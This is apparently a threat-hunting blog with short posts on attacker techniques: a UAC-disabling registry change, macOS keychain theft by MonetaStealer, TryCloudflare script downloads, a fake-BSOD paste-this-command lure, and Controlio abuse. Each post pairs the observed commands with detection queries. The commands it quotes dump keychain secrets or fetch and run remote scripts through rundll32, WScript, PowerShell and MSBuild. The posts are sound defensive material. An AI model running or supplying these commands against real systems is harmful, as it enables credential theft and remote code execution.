Know Your Adversary

Hello everyone! Today we’re going to look at another interesting example of the Modify Registry (T1112) technique, this time in the context of the Defense Evasion tactic. So, today’s example comes from an activity cluster known as KONNI . The malware used by the attacker modified the following registry parameter: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin This parameter defines how Windows requests confirmation for privilege elevation for administrators. Of course, the attackers change its value to “0”, which allows privilege elevation to occur without any confirmation. Therefore, it may be a good idea to look for suspicious events related to modification of this parameter: event_type: "registryvaluesetwin" AND reg_key_path: "consentpromptbehavioradmin" AND reg_value_data: "0x00000000" By the way, the report we’re discussing is yet another example of how attackers are abusing AI to develop malware and tools! ...

Hello everyone! It’s been a while since we last talked about macOS, so it’s high time to fix that. Today, we’ll look at an example of implementing the technique Credentials from Password Stores: Keychain (T1555.001) . As before, our focus is on real-world threats, and as an example we’ll examine MonetaStealer . This malware actively abuses the built-in macOS security utility, which is designed to work with the macOS security system - primarily the Keychain, certificates, passwords, and access control policies. For example, the stealer abuses this utility to obtain the key used to decrypt passwords saved in Google Chrome: security find-generic-password -w -a "Chrome" The utility is also used to extract data from the Keychain and search for specific keywords: security dump-keychain 2>/dev/null | grep -i {keyword} | head -20 Both examples can be good targets for hunting (or even detection): event_type: "processcreatemac" AND proc_file_path: "security" AND...

Hello everyone! As you know, attackers often abuse various legitimate web services - for example, to exfiltrate data or to download tools. Today we’ll look at another such service, TryCloudflare, and examine how attackers use it in the context of the Ingress Tool Transfer (T1105) technique. So, TryCloudflare makes it possible to expose a local service to the Internet, with access provided via a Cloudflare-generated domain, for example: plus-condos-thy-redeem.trycloudflare[.]com Let’s look at a recent example demonstrating abuse of this service. First, the attackers initiate a connection to the server: rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie plus-condos-thy-redeem.trycloudflare[.]com@SSL https://plus-condos-thy-redeem.trycloudflare[.]com/ Second, they download malicious scripts: "C:\WINDOWS\System32\WScript.exe" "\\plus-condos-thy-redeem.trycloudflare[.]com@SSL\DavWWWRoot\as.wsh" powershell -Command "iwr 'https://plus-condos-thy-redeem.tr...

Hello everyone! Why are phishing emails needed if victims can run a malicious command themselves? Yes, today we’re once again looking at an interesting variant of User Execution: Malicious Copy and Paste (T1204.004) . In fact, phishing emails were still involved: this time the attackers disguised themselves as Booking.com. The email contained a link leading to a phishing website. When the victim clicked the “Refresh page” button, the browser switched to full-screen mode and displayed a familiar instruction to copy and paste a malicious command - this time cleverly disguised as a Blue Screen of Death . As for the command itself, it was also quite interesting and included the use of Trusted Developer Utilities Proxy Execution: MSBuild (T1127.001) : powershell -c “start hxxps[://admin.booking[.]com;$msb=(gci C:\ -filter msbuild.exe -r -ea 0|select -f 1).FullName;iwr hxxps://2fa-bns[.]com/ -o $env:ProgramData\v.proj;& $msb $env:ProgramData\v.proj” Detection: Pay attention to file...

Hello everyone! I promised you to keep posting and notify you on any interesting tactics, techniques and procedures. So, let's start the new year! Harlan Carvey (I'm sure you've read his books !) shared that adversaries started to use Controlio - a cloud-based employee monitoring and productivity analytics platform.  By the way, it's not the first time adversaries use similar tools. Another example is Rare Werewolf: the adversary leveraged  Mipko Employee Monitor. Look for suspicious communications for controlio[.]net: event_type: "dnsreqwin" AND dns_rname: "controlio.net" Look for suspicious executions of Controlio-related binaries: event_type: "processcreatewin" AND proc_file_productname: "controlio" Happy hunting!

Hello everyone! No, no more detection and hunting tips today! And yes, it's the last post for the Zeltser challenge! It was a definitely a hard one, but still it was fun! Thank you Dave for motivating me to start it! Thanks everyone who reacted to the posts and wrote kind words - it helped me a lot to finish it! It doesn't mean I stop posting! But I won't do it every day! Still, if I see something interesting - I share it with you! Thank you for reading the blog and see you next year!